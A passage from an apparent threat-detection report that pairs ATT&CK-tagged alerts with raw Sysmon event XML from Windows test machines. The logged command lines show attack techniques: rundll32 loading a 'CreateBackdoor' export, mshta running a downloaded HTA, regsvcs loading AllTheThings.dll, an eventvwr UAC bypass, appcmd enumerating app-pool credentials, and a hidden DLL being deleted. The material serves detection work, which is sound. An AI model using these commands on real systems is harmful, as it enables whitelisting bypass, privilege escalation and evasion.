<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:06.562199Z"">
</TimeCreated>
<EventRecordID>16794</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:04.463</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49165</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">104.20.208.21</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:49.229742Z"">
</TimeCreated>
<EventRecordID>417085</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:49.217</Data>
<Data Name=""ProcessGuid"">747F3D96-D8F5-5F8A-0000-00106B6F7300</Data>
<Data Name=""ProcessId"">1680</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:28.250664Z"">
</TimeCreated>
<EventRecordID>4916</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.197</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001067768800</Data>
<Data Name=""ProcessId"">1296</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
</TimeCreated>
<EventRecordID>243540</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
<Data Name=""ProcessId"">1828</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( &quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:57:04.681038Z"">
</TimeCreated>
<EventRecordID>15</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1088,technique_name=Bypass User Account Control</Data>
<Data Name=""UtcTime"">2019-04-18 16:57:04.500</Data>
<Data Name=""ProcessGuid"">365ABB72-AC60-5CB8-0000-001037BA0800</Data>
<Data Name=""ProcessId"">3900</Data>
<Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft Management Console</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC60-5CB8-0000-001002B30800</Data>
<Data Name=""ParentProcessId"">3904</Data>
<Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
</TimeCreated>
<EventRecordID>7648</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
<Data Name=""ParentProcessId"">3660</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.121924Z"">
</TimeCreated>
<EventRecordID>5913</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.081</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C87FF00</Data>
<Data Name=""ProcessId"">2896</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
